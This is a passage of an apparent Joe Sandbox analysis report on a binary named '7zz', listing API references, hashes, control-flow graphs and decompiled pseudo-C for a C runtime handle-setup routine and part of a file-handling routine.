                                                                                  0x00427045
                                                                                  0x0042704a
                                                                                  0x00000000
                                                                                  0x0042704a
                                                                                  0x00426710
                                                                                  0x0042668a
                                                                                  0x00426691
                                                                                  0x00426693
                                                                                  0x00426695
                                                                                  0x00426698
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00426562
                                                                                  0x00426562
                                                                                  0x00426565
                                                                                  0x0042656d
                                                                                  0x0042656d
                                                                                  0x0042656f
                                                                                  0x00426577
                                                                                  0x00426586
                                                                                  0x00426586
                                                                                  0x00426579
                                                                                  0x00426579
                                                                                  0x0042657c
                                                                                  0x00426582
                                                                                  0x00426582
                                                                                  0x0042658a
                                                                                  0x0042658d
                                                                                  0x00426592
                                                                                  0x00426592
                                                                                  0x00426598
                                                                                  0x0042659a
                                                                                  0x004265a0
                                                                                  0x004265a6
                                                                                  0x004265ab
                                                                                  0x004265b1
                                                                                  0x004265b5
                                                                                  0x004265b8
                                                                                  0x004265c0
                                                                                  0x004265d2
                                                                                  0x004265d2
                                                                                  0x004265c2
                                                                                  0x004265c2
                                                                                  0x004265c5
                                                                                  0x004265c8
                                                                                  0x004265ce
                                                                                  0x004265ce
                                                                                  0x004265d6
                                                                                  0x004265d9
                                                                                  0x004265de
                                                                                  0x004265de
                                                                                  0x004265e2
                                                                                  0x004265e5
                                                                                  0x004265e9
                                                                                  0x004265ee
                                                                                  0x004265f6
                                                                                  0x004265fc
                                                                                  0x004265ff
                                                                                  0x00426602
                                                                                  0x00426606
                                                                                  0x00426609
                                                                                  0x0042660c
                                                                                  0x00426611
                                                                                  0x00426614
                                                                                  0x0042661a
                                                                                  0x0042661f
                                                                                  0x0042661f
                                                                                  0x00426624
                                                                                  0x00426628
                                                                                  0x0042662d
                                                                                  0x0042662d
                                                                                  0x00426630
                                                                                  0x00426639
                                                                                  0x00426640
                                                                                  0x0042656a
                                                                                  0x00000000
                                                                                  0x0042656a
                                                                                  0x00426646
                                                                                  0x00000000
                                                                                  0x00426646

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004264FC
                                                                                    • Part of subcall function 0042CD7D: __EH_prolog.LIBCMT ref: 0042CD82
                                                                                    • Part of subcall function 00467C60: InitializeCriticalSection.KERNEL32(?,00000001,?,?,-00000016), ref: 00467C8E
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426737
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00426A11
                                                                                  • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B05
                                                                                  • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B70
                                                                                  • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426BCC
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426D1E
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426D75
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426DCF
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426E3A
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00426E63
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426E9F
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00426ED6
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00426F12
                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 00426F8A
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 0042701A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Delete$FreeString$H_prolog$Initialize
                                                                                  • String ID: *$c[@
                                                                                  • API String ID: 3004459923-117524647
                                                                                  • Opcode ID: bcf1dbc30945ca63f9fdfa5c062172442a0eb17af4700839d2541935a3d072c6
                                                                                  • Instruction ID: 54e86bbab3a080c51c4da8baaff600dccbbf03e7154ae3ec1f80e40b651aacad
                                                                                  • Opcode Fuzzy Hash: bcf1dbc30945ca63f9fdfa5c062172442a0eb17af4700839d2541935a3d072c6
                                                                                  • Instruction Fuzzy Hash: A1927D70900259EFCF10DFA4D584ADDBBB0BF14308F6584AEE449A7391CB789A89CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046FCD7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1165 46fcd7-46fcef call 46bfc5 1168 46fcf1-46fcf8 call 46d03c 1165->1168 1169 46fcf9-46fd09 1165->1169 1168->1169 1171 46fd0f-46fd11 1169->1171 1173 46fd13-46fd2f 1171->1173 1174 46fd31-46fd40 GetStartupInfoA 1171->1174 1173->1171 1175 46fd46-46fd4b 1174->1175 1176 46fe17 1174->1176 1175->1176 1178 46fd51-46fd63 1175->1178 1177 46fe19-46fe29 1176->1177 1179 46fe2b-46fe31 1177->1179 1180 46fe78 1177->1180 1181 46fd67-46fd6d 1178->1181 1182 46fd65 1178->1182 1183 46fe33-46fe36 1179->1183 1184 46fe38-46fe3f 1179->1184 1185 46fe7c-46fe80 1180->1185 1186 46fdc5-46fdc9 1181->1186 1187 46fd6f 1181->1187 1182->1181 1188 46fe42-46fe4e GetStdHandle 1183->1188 1184->1188 1185->1177 1190 46fe82-46fe92 SetHandleCount 1185->1190 1186->1176 1189 46fdcb-46fdd3 1186->1189 1191 46fd74-46fd81 call 46bfc5 1187->1191 1193 46fe67-46fe6b 1188->1193 1194 46fe50-46fe59 GetFileType 1188->1194 1195 46fdd5-46fdd9 1189->1195 1196 46fe0d-46fe15 1189->1196 1200 46fd83-46fd8c 1191->1200 1201 46fdbf 1191->1201 1193->1185 1194->1193 1198 46fe5b-46fe65 1194->1198 1195->1196 1199 46fddb-46fddd 1195->1199 1196->1176 1196->1189 1198->1193 1202 46fe6d-46fe70 1198->1202 1203 46fddf-46fde8 GetFileType 1199->1203 1204 46fdea-46fe0a 1199->1204 1205 46fd92-46fd94 1200->1205 1201->1186 1202->1185 1206 46fe72-46fe76 1202->1206 1203->1196 1203->1204 1204->1196 1207 46fd96-46fdb0 1205->1207 1208 46fdb2-46fdbb 1205->1208 1206->1185 1207->1205 1208->1191 1209 46fdbd 1208->1209 1209->1186
                                                                                  C-Code - Quality: 99%
                                                                                  			E0046FCD7() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = L0046BFC5(0x480);
				if(_t89 == 0) {
					E0046D03C(0x1b);
				}
				 *0x496460 = _t89;
				 *0x496560 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x496460; // 0x2350630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x496460; // 0x2350630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x496560);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x496560 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x496460[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x496464;
					while(1) {
						_t69 = L0046BFC5(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x496560 =  *0x496560 + 0x20;
						__eflags =  *0x496560;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x496560 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x496560; // 0x20
					goto L18;
				}
			}




























                                                                                  0x0046fcea
                                                                                  0x0046fcef
                                                                                  0x0046fcf3
                                                                                  0x0046fcf8
                                                                                  0x0046fcf9
                                                                                  0x0046fcff
                                                                                  0x0046fd09
                                                                                  0x0046fd09
                                                                                  0x0046fd0f
                                                                                  0x0046fd13
                                                                                  0x0046fd17
                                                                                  0x0046fd1a
                                                                                  0x0046fd1e
                                                                                  0x0046fd22
                                                                                  0x0046fd27
                                                                                  0x0046fd2a
                                                                                  0x0046fd2a
                                                                                  0x0046fd35
                                                                                  0x0046fd3b
                                                                                  0x0046fd40
                                                                                  0x0046fe17
                                                                                  0x0046fe17
                                                                                  0x0046fe17
                                                                                  0x0046fe19
                                                                                  0x0046fe19
                                                                                  0x0046fe1f
                                                                                  0x0046fe22
                                                                                  0x0046fe26
                                                                                  0x0046fe29
                                                                                  0x0046fe78
                                                                                  0x0046fe78
                                                                                  0x0046fe78
                                                                                  0x00000000
                                                                                  0x0046fe78
                                                                                  0x0046fe2b
                                                                                  0x0046fe2d
                                                                                  0x0046fe31
                                                                                  0x0046fe3d
                                                                                  0x0046fe3f
                                                                                  0x0046fe3f
                                                                                  0x0046fe33
                                                                                  0x0046fe35
                                                                                  0x0046fe35
                                                                                  0x0046fe49
                                                                                  0x0046fe4b
                                                                                  0x0046fe4e
                                                                                  0x0046fe67
                                                                                  0x0046fe67
                                                                                  0x0046fe50
                                                                                  0x0046fe51
                                                                                  0x0046fe57
                                                                                  0x0046fe59
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fe5b
                                                                                  0x0046fe60
                                                                                  0x0046fe62
                                                                                  0x0046fe65
                                                                                  0x0046fe6d
                                                                                  0x0046fe70
                                                                                  0x0046fe72
                                                                                  0x0046fe72
                                                                                  0x00000000
                                                                                  0x0046fe70
                                                                                  0x00000000
                                                                                  0x0046fe65
                                                                                  0x0046fe7c
                                                                                  0x0046fe7c
                                                                                  0x0046fe7d
                                                                                  0x0046fe7d
                                                                                  0x0046fe92
                                                                                  0x0046fe92
                                                                                  0x0046fd46
                                                                                  0x0046fd49
                                                                                  0x0046fd4b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fd51
                                                                                  0x0046fd53
                                                                                  0x0046fd59
                                                                                  0x0046fd61
                                                                                  0x0046fd63
                                                                                  0x0046fd65
                                                                                  0x0046fd65
                                                                                  0x0046fd67
                                                                                  0x0046fd6d
                                                                                  0x0046fdc5
                                                                                  0x0046fdc5
                                                                                  0x0046fdc7
                                                                                  0x0046fdc9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fdcb
                                                                                  0x0046fdcb
                                                                                  0x0046fdce
                                                                                  0x0046fdd0
                                                                                  0x0046fdd3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fdd5
                                                                                  0x0046fdd7
                                                                                  0x0046fdd9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fddb
                                                                                  0x0046fddd
                                                                                  0x0046fdea
                                                                                  0x0046fdf1
                                                                                  0x0046fdf1
                                                                                  0x0046fdfe
                                                                                  0x0046fe06
                                                                                  0x0046fe0a
                                                                                  0x00000000
                                                                                  0x0046fe0a
                                                                                  0x0046fde0
                                                                                  0x0046fde6
                                                                                  0x0046fde8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fe0d
                                                                                  0x0046fe0d
                                                                                  0x0046fe11
                                                                                  0x0046fe12
                                                                                  0x0046fe13
                                                                                  0x0046fe13
                                                                                  0x00000000
                                                                                  0x0046fd6f
                                                                                  0x0046fd6f
                                                                                  0x0046fd74
                                                                                  0x0046fd79
                                                                                  0x0046fd7e
                                                                                  0x0046fd81
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fd83
                                                                                  0x0046fd83
                                                                                  0x0046fd8a
                                                                                  0x0046fd8c
                                                                                  0x0046fd8c
                                                                                  0x0046fd92
                                                                                  0x0046fd92
                                                                                  0x0046fd94
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fd96
                                                                                  0x0046fd9a
                                                                                  0x0046fd9d
                                                                                  0x0046fda1
                                                                                  0x0046fda7
                                                                                  0x0046fdaa
                                                                                  0x0046fdaa
                                                                                  0x0046fdb2
                                                                                  0x0046fdb5
                                                                                  0x0046fdbb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046fdbd
                                                                                  0x0046fdbf
                                                                                  0x00000000
                                                                                  0x0046fdbf

                                                                                  APIs
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0046FD35
                                                                                  • GetFileType.KERNEL32(00000480), ref: 0046FDE0
                                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 0046FE43
                                                                                  • GetFileType.KERNELBASE(00000000), ref: 0046FE51
                                                                                  • SetHandleCount.KERNEL32 ref: 0046FE88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                  • String ID: ddI
                                                                                  • API String ID: 1710529072-3188649337
                                                                                  • Opcode ID: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
                                                                                  • Instruction ID: c6205cd4f5c3ada4982f3df846bf7a0052440ebcd376ac522a15a622ffbc9688
                                                                                  • Opcode Fuzzy Hash: 1896333707a73830e72ce406a203d9127db2bfa533a9f37e38ad935da20a16a3
                                                                                  • Instruction Fuzzy Hash: B95118715002058BC720CF68E9447667BA0EB21768F25467FC5D2CB2E2FB39984ACB4B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00415420 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1210 415420-41543f __EH_prolog 1211 415441-415448 call 408c73 1210->1211 1212 41544e-415453 1210->1212 1211->1212 1220 41544a 1211->1220 1214 415482 1212->1214 1215 415455-41547b 1212->1215 1217 415485-41548d 1214->1217 1215->1217 1224 41547d 1215->1224 1218 415493-415497 1217->1218 1219 4158a9-415903 call 411bd0 call 4039c0 call 407a18 call 40351a call 40b5c9 1217->1219 1218->1219 1222 41549d-4154a0 1218->1222 1263 415909 1219->1263 1264 415b38-415b4d GetLastError call 415c6d call 406796 1219->1264 1220->1212 1225 4154a2-4154ac 1222->1225 1226 4154ce-4154d1 1222->1226 1228 415bb9-415bc7 1224->1228 1225->1226 1229 4154ae-4154b2 1225->1229 1226->1219 1230 4154d7-4154fa call 404ad0 1226->1230 1229->1226 1232 4154b4-4154bd 1229->1232 1239 415500-415539 call 40b0a0 call 40351a call 40b431 1230->1239 1240 415723-41572b 1230->1240 1232->1226 1235 4154bf-4154c6 call 408a3b 1232->1235 1235->1226 1249 4154c8-4154cc 1235->1249 1266 41553e-415540 1239->1266 1242 415731-415734 1240->1242 1243 415870-41587c call 408604 1240->1243 1247 415743-41577b call 40b0a0 call 40351a call 40b431 1242->1247 1248 415736-41573d 1242->1248 1261 415b73-415b75 1243->1261 1290 4157c6-4157d1 1247->1290 1291 41577d-415786 call 408c9e 1247->1291 1248->1247 1255 415860-41586a 1248->1255 1249->1225 1249->1226 1255->1242 1255->1243 1261->1228 1267 41590e-415912 1263->1267 1272 415b52-415b6e call 407a18 * 2 call 40b154 1264->1272 1270 415542-415576 GetLastError call 415c6d call 406796 call 407a18 * 2 1266->1270 1271 41557b-415587 1266->1271 1267->1272 1273 415918-41591c 1267->1273 1350 415714-41571d 1270->1350 1282 4155e0-4155e4 1271->1282 1283 415589-41558d 1271->1283 1272->1261 1277 415953-4159a7 call 4092a8 call 406796 call 4092a8 call 408e8a 1273->1277 1278 41591e-415922 1273->1278 1353 4159a9-4159c8 call 40862d call 408604 1277->1353 1354 4159cd-415a02 call 40862d call 408604 call 408e8a 1277->1354 1278->1277 1285 415924-41594a 1278->1285 1287 4155e6-4155ff call 415c6d call 406796 1282->1287 1288 41558f-4155c6 call 405b9f call 406796 call 408e8a 1282->1288 1283->1287 1283->1288 1311 415950 1285->1311 1312 415b77-415b79 1285->1312 1335 4156f8-415713 call 407a18 * 2 1287->1335 1346 415604-415637 call 40862d call 408604 call 4150e0 1288->1346 1347 4155c8-4155db call 40862d 1288->1347 1294 4157d3 1290->1294 1295 4157ee-415845 call 405b9f call 415bca call 40862d call 408604 1290->1295 1317 415847-41585f call 407a18 * 2 1291->1317 1318 41578c-415793 GetLastError 1291->1318 1303 4157d8-4157ec call 415c6d call 406796 1294->1303 1295->1317 1368 415881-41588c call 407a18 1295->1368 1303->1317 1311->1277 1326 415b96-415bb7 call 407a18 * 2 call 40b154 1312->1326 1317->1255 1318->1303 1326->1228 1335->1350 1346->1335 1386 41563d-415661 call 405b9f call 408b37 1346->1386 1369 4156f3 call 408604 1347->1369 1350->1239 1350->1240 1383 415ae7-415b32 call 40862d call 408604 call 407a18 call 40351a call 40b5c9 1353->1383 1392 415a04-415a25 call 4150e0 1354->1392 1393 415a2b-415a36 1354->1393 1381 41588f-4158a4 call 407a18 call 408604 1368->1381 1369->1335 1381->1228 1383->1264 1383->1267 1413 415663-415666 1386->1413 1414 41568d-415699 call 406796 1386->1414 1392->1393 1406 415a27 1392->1406 1395 415a44-415a4f 1393->1395 1396 415a38-415a3f 1393->1396 1401 415a51-415a61 call 408b37 1395->1401 1402 415a6c-415a70 1395->1402 1396->1383 1401->1402 1419 415a63-415a69 1401->1419 1409 415a81-415a98 call 40862d call 409500 1402->1409 1410 415a72-415a76 1402->1410 1406->1393 1432 415a9a-415aa7 call 406796 1409->1432 1433 415aac-415add call 415bca 1409->1433 1410->1409 1415 415a78-415a7f 1410->1415 1420 415668-41566d 1413->1420 1421 41567b-41568b 1413->1421 1426 41569e-4156d4 call 415bca 1414->1426 1415->1383 1419->1402 1427 41566e-415679 call 43ac2f 1420->1427 1421->1426 1439 415795-4157c1 call 40862d call 408604 call 407a18 1426->1439 1440 4156da-4156ed call 40862d 1426->1440 1427->1421 1432->1433 1445 415ae3 1433->1445 1446 415b7b-415b93 call 40862d call 408604 1433->1446 1439->1381 1440->1369 1445->1383 1446->1326
                                                                                  C-Code - Quality: 81%
                                                                                  			E00415420(signed int __ecx, intOrPtr __edx) {
				intOrPtr _t314;
				void* _t315;
				signed int _t321;
				signed int _t328;
				signed int _t340;
				signed char _t350;
				intOrPtr _t351;
				signed int _t356;
				signed int _t368;
				signed int _t373;
				signed int _t377;
				signed char _t383;
				signed int _t388;
				signed int _t393;
				signed char _t395;
				signed int _t411;
				intOrPtr _t415;
				signed int _t418;
				signed int _t421;
				signed int _t424;
				intOrPtr _t460;
				signed int _t462;
				signed int _t469;
				signed int _t473;
				signed int _t476;
				intOrPtr _t532;
				void* _t555;
				intOrPtr _t564;
				signed int _t568;
				signed int _t573;
				signed int _t579;
				intOrPtr _t581;
				signed int _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t593;
				void* _t596;

				L0046B890(E0047490E, _t596);
				_t469 = __ecx;
				 *((intOrPtr*)(_t596 - 0x3c)) = __edx;
				 *(_t596 - 0x10) = __ecx;
				if( *(_t596 + 0x18) == 0 && E00408C73(__ecx) != 0) {
					 *(_t596 + 0x18) = 1;
				}
				_t568 =  *(_t596 + 0x1c);
				if(_t568 == 0) {
					_t581 =  *((intOrPtr*)(_t596 + 0x14));
					L7:
					_t314 =  *((intOrPtr*)(_t596 + 0x10));
					_t590 = 0;
					__eflags =  *(_t314 + 8);
					if( *(_t314 + 8) != 0) {
						L53:
						_push(0x2a);
						_t315 = E00411BD0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
						 *(_t596 - 0x78) =  *(_t596 - 0x78) | 0xffffffff;
						 *(_t596 - 4) = 0xd;
						 *(_t596 - 4) = 0xe;
						L004039C0(_t596 - 0x74, _t315);
						 *(_t596 - 4) = 0x10;
						L00407A18( *((intOrPtr*)(_t596 - 0x20)));
						 *(_t596 - 0x38) =  *(_t596 - 0x38) & 0x00000000;
						L0040351A(_t596 - 0xd4);
						_push(_t596 - 0x11);
						 *(_t596 - 4) = 0x11;
						_t321 = L0040B5C9(_t596 - 0xfc);
						__eflags = _t321;
						if(_t321 == 0) {
							L78:
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push( *((intOrPtr*)(_t596 + 0xc)));
							L00406796( *((intOrPtr*)(_t596 + 0x20)));
							L79:
							L00407A18( *((intOrPtr*)(_t596 - 0xd4)));
							_t297 = _t596 - 4;
							 *_t297 =  *(_t596 - 4) | 0xffffffff;
							__eflags =  *_t297;
							L00407A18( *((intOrPtr*)(_t596 - 0x74)));
							E0040B154(_t596 - 0x78);
							L80:
							_t328 = 0;
							L84:
							 *[fs:0x0] =  *((intOrPtr*)(_t596 - 0xc));
							return _t328;
						}
						while(1) {
							__eflags =  *((char*)(_t596 - 0x11));
							if( *((char*)(_t596 - 0x11)) == 0) {
								goto L79;
							}
							__eflags =  *(_t596 + 0x1c);
							if( *(_t596 + 0x1c) == 0) {
								L60:
								_push( *((intOrPtr*)(_t596 + 0x10)));
								 *((char*)(_t596 - 0x40)) =  *(_t596 + 0x18);
								E004092A8(_t596 - 0x34);
								_push(_t596 - 0xd4);
								 *(_t596 - 4) = 0x12;
								L00406796(_t596 - 0x34);
								_push(_t596 - 0x34);
								E004092A8(_t596 - 0x54);
								 *(_t596 - 4) = 0x13;
								_t340 = E00408E8A(_t469, 0, _t596 - 0x54,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
								__eflags = _t340;
								 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
								if(_t340 == 0) {
									 *(_t596 - 4) = 0x16;
									E0040862D();
									 *(_t596 - 4) = 0x12;
									E00408604(_t596 - 0x54);
									__eflags = E00408E8A(_t469, 1, _t596 - 0x34,  !( *(_t596 - 0xdc) >> 4) & 0x00000001);
									if(__eflags != 0) {
										_push(_t581 + 0x3c);
										_push(_t596 - 0xfc);
										E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
										_t383 =  *(_t596 - 0xdc) >> 4;
										__eflags = _t383 & 0x00000001;
										if((_t383 & 0x00000001) != 0) {
											 *((char*)(_t596 - 0x40)) = 1;
										}
									}
									_t350 =  *(_t596 - 0xdc) >> 4;
									__eflags = _t350 & 0x00000001;
									if((_t350 & 0x00000001) != 0) {
										_t351 =  *((intOrPtr*)(_t596 + 0x10));
										 *(_t596 - 0x10) =  *(_t596 - 0x10) & 0x00000000;
										__eflags =  *(_t351 + 8);
										if( *(_t351 + 8) == 0) {
											_t377 = E00408B37(_t469, _t596 - 0xd4);
											__eflags = _t377;
											if(_t377 >= 0) {
												 *(_t596 - 0x10) =  *( *((intOrPtr*)(_t469 + 0x1c)) + _t377 * 4);
											}
										}
										__eflags =  *((char*)(_t596 - 0x40));
										if( *((char*)(_t596 - 0x40)) != 0) {
											L73:
											E0040862D();
											_push( *((intOrPtr*)(_t596 + 0x10)));
											E00409500(_t596 - 0x34);
											__eflags =  *(_t596 - 0x10);
											if(__eflags == 0) {
												_push(_t596 - 0xd4);
												 *(_t596 - 0x10) = _t469;
												L00406796(_t596 - 0x34);
											}
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											_push( *(_t596 + 0x1c));
											_push( *((intOrPtr*)(_t596 - 0x40)));
											_push(_t581);
											_push(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0xd4);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t356 = E00415BCA( *(_t596 - 0x10),  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											__eflags = _t356;
											 *(_t596 - 0x10) = _t356;
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											if(_t356 != 0) {
												 *(_t596 - 4) = 0x19;
												E0040862D();
												 *(_t596 - 4) = 0x11;
												E00408604(_t596 - 0x34);
												_t593 =  *(_t596 - 0x10);
												L83:
												L00407A18( *((intOrPtr*)(_t596 - 0xd4)));
												_t308 = _t596 - 4;
												 *_t308 =  *(_t596 - 4) | 0xffffffff;
												__eflags =  *_t308;
